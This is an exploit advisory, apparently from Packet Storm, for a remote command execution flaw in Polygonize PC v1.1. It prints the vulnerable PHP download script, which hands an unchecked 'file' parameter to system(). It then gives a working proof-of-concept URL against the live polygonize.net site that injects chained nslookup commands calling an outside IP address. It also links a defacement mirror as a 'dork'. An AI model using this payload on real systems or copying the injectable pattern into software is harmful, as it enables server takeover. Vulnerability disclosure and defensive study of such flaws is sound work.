Polygonize PC version 1.1 suffers from a remote command execution vulnerability.
bc7b18c1d116b956ac3140448604dbacfb3b5fd10e968f8c0ab543e1357466b6============================================================================================================================
| # Title : Polygonize PC v1.1 RCE Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.1 |
| # Vendor : http://polygonize.net/ |
| # Dork : http://www.zone-h.org/mirror/id/30699471 |
============================================================================================================================
poc :
<?
/*************************************
* Code to download JPGs, PDFs, etc
* www.sometricks.com
*************************************/
$file = $_GET['file'];
$file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file'];
system("/usr/bin/composite -gravity SouthEast watermark.png $file $file");
if(@is_array(getimagesize($file))){
$image = true;
} else {
$image = false;
}
//print_r(getimagesize($file2));
//exit();
if ($image==true) {
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
}
else echo "Wrong image type";
exit;
?>
http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed